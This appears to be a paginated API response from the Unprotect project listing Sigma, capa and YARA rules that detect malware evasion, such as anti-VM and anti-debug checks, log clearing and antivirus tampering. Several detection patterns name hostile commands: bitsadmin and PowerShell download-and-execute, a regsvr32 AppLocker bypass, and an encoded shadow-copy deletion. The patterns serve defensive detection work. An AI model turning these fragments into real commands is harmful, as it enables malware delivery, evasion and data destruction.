GET /api/detection_rules/
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 56,
    "next": "https://search.unprotect.it/api/detection_rules/?page=2",
    "previous": null,
    "results": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "Anti_vm",
            "rule": "title: AntiVM\r\nstatus: experimental\r\ndescription: Detect virtual environment \"VirtualBox|VMware|KVM|HVM\"  \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200020\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack: T1497\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*IlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0i*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "base64_download",
            "rule": "title: Powershell download file from base64 url\r\nstatus: experimental\r\ndescription: Powershell download file from base64 url\r\nauthor: Joe Security\r\ndate: 2020-04-13\r\nid: 200072\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:\r\n          CommandLine:\r\n              - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "bitsadmin",
            "rule": "title: bitsadmin download and execute\r\nstatus: experimental\r\ndescription: Detect bitsadmin download and execute activity\r\nauthor: Joe Security\r\ndate: 2019-11-25\r\nid: 200031\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*bitsadmin /transfer*http*start %APPDATA%*'\r\n              - '*/transfer*http*.dll&& rundll32*'\r\n              - '*powershell*start-bitstransfer*start-process*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "bypass_applocker",
            "rule": "title: AppLocker Bypass via Regsvr32\r\nstatus: experimental\r\ndescription: AppLocker Bypass via Regsvr32\r\nauthor: Joe Security\r\ndate: 2020-03-04\r\nid: 200059\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*regsvr32*/s /u /n /i:http*scrobj*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "capa_debugger_api",
            "rule": "rule:\r\n  meta:\r\n    name: check for debugger via API\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::CheckRemoteDebuggerPresent [B0001.002]\r\n      - Anti-Behavioral Analysis::Debugger Detection::WudfIsAnyDebuggerPresent [B0001.031]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/CheckRemoteDebuggerPresent.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x420000\r\n  features:\r\n    - or:\r\n      - api: kernel32.CheckRemoteDebuggerPresent\r\n      - api: WUDFPlatform.WudfIsAnyDebuggerPresent\r\n      - api: WUDFPlatform.WudfIsKernelDebuggerPresent\r\n      - api: WUDFPlatform.WudfIsUserDebuggerPresent"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "check_external_ip",
            "rule": "title: Check external IP via Powershell\r\nstatus: experimental\r\ndescription: Check external IP via Powershell\r\nauthor: Joe Security\r\ndate: 2020-07-20\r\nid: 200081\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 6\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*api.ipify.org*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "Check for Sandbox and AV Modules",
            "rule": "rule:\r\n  meta:\r\n    name: check for sandbox and av modules\r\n    namespace: anti-analysis/anti-av\r\n    author: \"@_re_fox\"\r\n    scope: basic block\r\n    unprotect: U0508\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n      - Anti-Behavioral Analysis::Sandbox Detection [B0007]\r\n    examples:\r\n      - ccbf7cba35bab56563c0fbe4237fdc41:0x0040a4a0\r\n  features:\r\n    - and:\r\n      - api: GetModuleHandle\r\n      - or:\r\n        - string: /avghook(x|a)\\.dll/i\r\n          description: AVG\r\n        - string: /snxhk\\.dll/i \r\n          description: Avast\r\n        - string: /sf2\\.dll/i \r\n          description: Avast\r\n        - string: /sbiedll\\.dll/i\r\n          description: Sandboxie\r\n        - string: /dbghelp\\.dll/i \r\n          description: WindBG\r\n        - string: /api_log\\.dll/i \r\n          description: iDefense Lab\r\n        - string: /dir_watch\\.dll/ \r\n          description: iDefense Lab\r\n        - string: /pstorec\\.dll/i\r\n          description: SunBelt Sandbox\r\n        - string: /vmcheck\\.dll/i\r\n          description: Virtual PC\r\n        - string: /wpespy\\.dll/i\r\n          description: WPE Pro\r\n        - string: /cmdvrt(64|32).dll/i \r\n          description: Comodo Container\r\n        - string: /sxin.dll/i \r\n          description: 360 SOFTWARE\r\n        - string: /dbghelp\\.dll/i\r\n          description: WINE\r\n        - string: /printfhelp\\.dll/i \r\n          description: Unknown Sandbox"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Checks for QEMU Registry Key",
            "rule": "rule Qemu_Detection\r\n{\r\n\tmeta:\r\n\t\tAuthor = \"Thomas Roccia - @fr0gger_ - Unprotect Project\"\r\n\t\tDescription = \"Checks for QEMU Registry Key\"\r\n\tstrings:\r\n\t\t$desc1 = \"HARDWARE\\\\Description\\\\System\" nocase wide ascii\r\n\t\t$desc2 = \"SystemBiosVersion\" nocase wide ascii\r\n\t\t$desc3 = \"QEMU\" wide nocase ascii\r\n\r\n\t\t$dev1 = \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\" nocase wide ascii\r\n\t\t$dev2 = \"Identifier\" nocase wide ascii\r\n\t\t$dev3 = \"QEMU\" wide nocase ascii\r\n\tcondition:\r\n\t\tany of ($desc*) or any of ($dev*)\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Checks for VBOX Registry Key",
            "rule": "rule VBox_Detection\r\n{\r\n\tmeta:\r\n\t\tAuthor = \"Thomas Roccia - @fr0gger_ - Unprotect Project\"\r\n\t\tDescription = \"Checks for VBOX Registry Key\"\r\n\tstrings:\r\n\t\t$desc1 = \"HARDWARE\\\\Description\\\\System\" nocase wide ascii\r\n\t\t$desc2 = \"SystemBiosVersion\" nocase wide ascii\r\n\t\t$desc3 = \"VideoBiosVersion\" nocase wide ascii\r\n\r\n\t\t$data1 = \"VBOX\" nocase wide ascii\r\n\t\t$data2 = \"VIRTUALBOX\" nocase wide ascii\r\n\t\t\r\n\t\t$dev1 = \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\" nocase wide ascii\r\n\t\t$dev2 = \"Identifier\" nocase wide ascii\r\n\t\t$dev3 = \"VBOX\" nocase wide ascii\r\n\r\n\t\t$soft1 = \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\"\r\n\t\t$soft2 = \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\"\r\n\t\t$soft3 = \"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\"\r\n\t\t$soft4 = \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\"\r\n\t\t$soft5 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\"\r\n\t\t$soft6 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\"\r\n\t\t$soft7 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\"\r\n\t\t$soft8 = \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\"\r\n\r\n\t\t$virtualbox1 = \"VBoxHook.dll\" nocase\r\n\t        $virtualbox2 = \"VBoxService\" nocase\r\n        \t$virtualbox3 = \"VBoxTray\" nocase\r\n        \t$virtualbox4 = \"VBoxMouse\" nocase\r\n        \t$virtualbox5 = \"VBoxGuest\" nocase\r\n        \t$virtualbox6 = \"VBoxSF\" nocase\r\n        \t$virtualbox7 = \"VBoxGuestAdditions\" nocase\r\n        \t$virtualbox8 = \"VBOX HARDDISK\"  nocase\r\n        \t$virtualbox9 = \"VBoxVideo\" nocase\r\n\t\t$virtualbox10 = \"vboxhook\" nocase\r\n\t\t$virtualbox11 = \"vboxmrxnp\" nocase\r\n\t\t$virtualbox12 = \"vboxogl\" nocase\r\n\t\t$virtualbox13 = \"vboxoglarrayspu\" nocase\r\n\t\t$virtualbox14 = \"vboxoglcrutil\"\r\n\t\t$virtualbox15 = \"vboxoglerrorspu\" nocase\r\n\t\t$virtualbox16 = \"vboxoglfeedbackspu\" 
nocase\r\n\t\t$virtualbox17 = \"vboxoglpackspu\" nocase\r\n\t\t$virtualbox18 = \"vboxoglpassthroughspu\" nocase\r\n\t\t$virtualbox19 = \"vboxcontrol\" nocase\r\n\r\n        \t// VirtualBox Mac Address\r\n        \t$virtualbox_mac_1a = \"08-00-27\"\r\n        \t$virtualbox_mac_1b = \"08:00:27\"\r\n        \t$virtualbox_mac_1c = \"080027\"\t\r\n\tcondition:\r\n\t\tany of ($desc*) and \r\n\t\t1 of ($data*) or \r\n\t\tany of ($dev*) or \r\n\t\tany of ($soft*) or\r\n\t\tany of ($virtualbox*)\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "clear_log",
            "rule": "rule:\r\n  meta:\r\n    name: clear the Windows event log\r\n    namespace: anti-analysis/anti-forensic/clear-logs\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]\r\n    examples:\r\n      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0\r\n  features:\r\n    - and:\r\n      - api: advapi32.ElfClearEventLogFile\r\n      - optional:\r\n        - api: advapi32.OpenEventLog"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "crash_eventlog",
            "rule": "rule:\r\n  meta:\r\n    name: crash the Windows event logging service\r\n    namespace: anti-analysis/anti-forensic\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Impair Defenses::Disable Windows Event Logging [T1562.002]\r\n    references:\r\n      - https://github.com/limbenjamin/LogServiceCrash\r\n    examples:\r\n      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0\r\n  features:\r\n    - and:\r\n      - count(api(advapi32.ElfClearEventLogFileW)): 3 or more\r\n      - count(api(advapi32.OpenEventLogA)): 1 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "debugged_flag",
            "rule": "rule:\r\n  meta:\r\n    name: check for PEB BeingDebugged flag\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: moritz.raabe@fireeye.com\r\n    scope: basic block\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Process Environment Block BeingDebugged [B0001.035]\r\n    references:\r\n      - Practical Malware Analysis, Chapter 16, p. 353\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-01.exe_:0x403530\r\n  features:\r\n    - and:\r\n      - match: PEB access\r\n      - offset: 2 = PEB.BeingDebugged"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "DebuggerCheck__GlobalFlags",
            "rule": "rule DebuggerCheck__GlobalFlags  {\r\n    meta:\r\n\tdescription = \"Rule to detect NtGlobalFlags debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = \"NtGlobalFlags\"\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "DebuggerCheck__RemoteAPI",
            "rule": "rule DebuggerCheck__RemoteAPI {\r\n    meta:\r\n        description = \"Rule to detect RemoteAPI debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 =\"CheckRemoteDebuggerPresent\"\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "debug_register",
            "rule": "rule:\r\n  meta:\r\n    name: check for hardware breakpoints\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Hardware Breakpoints [B0001.005]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/HardwareBreakpoints.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x42035D\r\n  features:\r\n    - and:\r\n      - api: kernel32.GetThreadContext\r\n      - number: 0x10010 = CONTEXT_DEBUG_REGISTERS\r\n      - offset: 0x4 = DR0\r\n      - offset: 0x8 = DR1\r\n      - offset: 0xC = DR2\r\n      - offset: 0x10 = DR3\r\n      - count(mnemonic(cmp)): 4 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "decode_string_findstr",
            "rule": "title: Decode strings from lnk via findstr.exe\r\nstatus: experimental\r\ndescription: uses findstr.exe to decode strings from lnk file\r\nauthor: Joe Security\r\ndate: 2019-11-11\r\nid: 200024\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*findstr /b /i *.lnk*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "delete_shadow_copy",
            "rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Detect_AntiVMWithTemperature",
            "rule": "rule Detect_AntiVMWithTemperature {\r\n    meta:\r\n        description = \"Rule to detect AntiVMwithTemperature technique\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = {72 6f 6f 74 5c 57 4d 49}\r\n        // root\\WMI\r\n        $s2 = {53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 4d 53 41 63 70 69 5f 54 68 65 72 6d 61 6c 5a 6f 6e 65 54 65 6d 70 65 72 61 74 75 72 65}\r\n        // SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n        $s3 = {43 75 72 72 65 6e 74 54 65 6d 70 65 72 61 74 75 72 65}\r\n        // CurrentTemperature\r\n    \r\n    condition:\r\n    all of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "detect_region",
            "rule": "title: Geofenced Ru\r\nstatus: experimental\r\ndescription: Detect region and exit if matched with hardcoded country list Get-UICulture).Name -match \"CN|RO|RU|UA|BY \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200019\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 8\r\nmitreattack: T1241\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*R2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZI*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "detect_tlscallback",
            "rule": "rule detect_tlscallback {\r\n    meta:\r\n        description = \"Simple rule to detect tls callback as anti-debug.\"\r\n        author = \"Thomas Roccia | @fr0gger_\"\r\n    strings:\r\n        $str1 = \"TLS_CALLBACK\" nocase\r\n        $str2 = \"TLScallback\" nocase\r\n    condition:\r\n        uint32(uint32(0x3C)) == 0x4550 and any of them\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "detect_vm_process",
            "rule": "rule:\r\n  meta:\r\n    name: check for windows sandbox via process name\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: \"@_re_fox\"\r\n    scope: function\r\n    att&ck:\r\n      - Defense Evasion::Virtualization/Sandbox Evasion::System Checks [T1497.001]\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n    references:\r\n      - https://github.com/LloydLabs/wsb-detect\r\n    examples:\r\n      - 773290480d5445f11d3dc1b800728966:0x140001140\r\n  features:\r\n    - and:\r\n      - match: enumerate processes\r\n      - string: CExecSvc.exe"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "device_pipe",
            "rule": "rule:\r\n  meta:\r\n    name: check for windows sandbox via device\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: \"@_re_fox\"\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Virtualization/Sandbox Evasion::System Checks [T1497.001]\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n    references:\r\n      - https://github.com/LloydLabs/wsb-detect\r\n    examples:\r\n      - 773290480d5445f11d3dc1b800728966:0x140001140\r\n  features:\r\n    - and:\r\n      - api: CreateFile\r\n      - string: \\\\.\\GLOBALROOT\\device\\vmsmb"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "disable_antivirus",
            "rule": "import \"pe\"\r\n\r\nrule disable_antivirus \r\n{\r\n    meta:\r\n\tauthor = \"x0r\"\r\n\tdescription = \"Disable AntiVirus\"\r\n\r\n    strings:\r\n        $p1 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun\" nocase\r\n        $p2 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\\" nocase\r\n        $p3 = \"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\" nocase\r\n\r\n        $c1 = \"RegSetValue\" \r\n\r\n        $r1 = \"AntiVirusDisableNotify\" \r\n        $r2 = \"DontReportInfectionInformation\" \r\n        $r3 = \"DisableAntiSpyware\" \r\n        $r4 = \"RunInvalidSignatures\" \r\n        $r5 = \"AntiVirusOverride\" \r\n        $r6 = \"CheckExeSignatures\"\r\n\r\n        $f1 = \"blackd.exe\" nocase\r\n        $f2 = \"blackice.exe\" nocase\r\n        $f3 = \"lockdown.exe\" nocase\r\n        $f4 = \"lockdown2000.exe\" nocase\r\n        $f5 = \"taskkill.exe\" nocase\r\n        $f6 = \"tskill.exe\" nocase\r\n        $f7 = \"smc.exe\" nocase\r\n        $f8 = \"sniffem.exe\" nocase\r\n        $f9 = \"zapro.exe\" nocase\r\n        $f10 = \"zlclient.exe\" nocase\r\n        $f11 = \"zonealarm.exe\" nocase\r\n\r\n    condition:\r\n        ($c1 and $p1 and 1 of ($f*)) or ($c1 and $p2) or 1 of ($r*) or $p3\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Findcrypt",
            "rule": "/*\r\n    from https://github.com/Yara-Rules/rules/tree/master/Crypto\r\n    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.\r\n*/\r\nrule Big_Numbers0\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 20:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{20}/ fullword ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers1\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 32:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{32}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers2\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 48:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{48}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers3\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 64:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{64}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers4\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 128:sized\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{128}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers5\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 256:sized\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{256}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Prime_Constants_char {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"List of primes [char]\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 03 05 07 0B 0D 11 13 17 1D 1F 25 29 2B 
2F 35 3B 3D 43 47 49 4F 53 59 61 65 67 6B 6D 71 7F 83 89 8B 95 97 9D A3 A7 AD B3 B5 BF C1 C5 C7 D3 DF E3 E5 E9 EF F1 FB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Prime_Constants_long {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"List of primes [long]\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 03 00 00 00 05 00 00 00 07 00 00 00 0B 00 00 00 0D 00 00 00 11 00 00 00 13 00 00 00 17 00 00 00 1D 00 00 00 1F 00 00 00 25 00 00 00 29 00 00 00 2B 00 00 00 2F 00 00 00 35 00 00 00 3B 00 00 00 3D 00 00 00 43 00 00 00 47 00 00 00 49 00 00 00 4F 00 00 00 53 00 00 00 59 00 00 00 61 00 00 00 65 00 00 00 67 00 00 00 6B 00 00 00 6D 00 00 00 71 00 00 00 7F 00 00 00 83 00 00 00 89 00 00 00 8B 00 00 00 95 00 00 00 97 00 00 00 9D 00 00 00 A3 00 00 00 A7 00 00 00 AD 00 00 00 B3 00 00 00 B5 00 00 00 BF 00 00 00 C1 00 00 00 C5 00 00 00 C7 00 00 00 D3 00 00 00 DF 00 00 00 E3 00 00 00 E5 00 00 00 E9 00 00 00 EF 00 00 00 F1 00 00 00 FB 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule Advapi_Hash_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for advapi API functions\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$advapi32 = \"advapi32.dll\" wide ascii nocase\r\n\t\t$CryptCreateHash = \"CryptCreateHash\" wide ascii\r\n\t\t$CryptHashData = \"CryptHashData\" wide ascii\r\n\t\t$CryptAcquireContext = \"CryptAcquireContext\" wide ascii\r\n\tcondition:\r\n\t\t$advapi32 and ($CryptCreateHash and $CryptHashData and $CryptAcquireContext)\r\n}\r\n\r\nrule Crypt32_CryptBinaryToString_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for crypt32 CryptBinaryToStringA function\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$crypt32 = \"crypt32.dll\" wide ascii nocase\r\n\t\t$CryptBinaryToStringA = \"CryptBinaryToStringA\" wide ascii\r\n\tcondition:\r\n\t\t$crypt32 and ($CryptBinaryToStringA)\r\n}\r\n\r\nrule CRC32c_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for 
CRC32c (Castagnoli) [poly]\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$c0 = { 783BF682 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32 [poly]\"\r\n\t\tdate = \"2015-05\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 2083B8ED }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32 table\"\r\n\t\tdate = \"2015-05\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_table_lookup {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"CRC32 table lookup\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 54 24 08 85 D2 7F 03 33 C0 C3 83 C8 FF 33 C9 85 D2 7E 29 56 8B 74 24 08 57 8D 9B 00 00 00 00 0F B6 3C 31 33 F8 81 E7 FF 00 00 00 C1 E8 08 33 04 BD ?? ?? ?? ?? 
41 3B CA 7C E5 5F 5E F7 D0 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32b_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32b [poly]\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { B71DC104 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule CRC16_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC16 table\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 00 00 21 10 42 20 63 30 84 40 A5 50 C6 60 E7 70 08 81 29 91 4A A1 6B B1 8C C1 AD D1 CE E1 EF F1 31 12 10 02 73 32 52 22 B5 52 94 42 F7 72 D6 62 39 93 18 83 7B B3 5A A3 BD D3 9C C3 FF F3 DE E3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FlyUtilsCnDES_ECB_Encrypt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for FlyUtils.CnDES Encrypt ECB function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D E8 89 5D EC 8B D9 89 55 F8 89 45 FC 8B 7D 08 8B 75 20 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 80 7D 18 00 74 1A 0F B6 55 18 8D 4D EC 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 EC 8D 45 F8 E8 ?? ?? ?? ?? 80 7D 1C 00 74 1A 0F B6 55 1C 8D 4D E8 8B 45 FC E8 ?? ?? ?? ?? 8B 55 E8 8D 45 FC E8 ?? ?? ?? ?? 85 DB 75 07 E8 ?? ?? ?? ?? 8B D8 85 F6 75 07 E8 ?? ?? ?? ?? 8B F0 53 6A 00 8B 4D FC B2 01 A1 ?? ?? ?? ?? E8 ?? 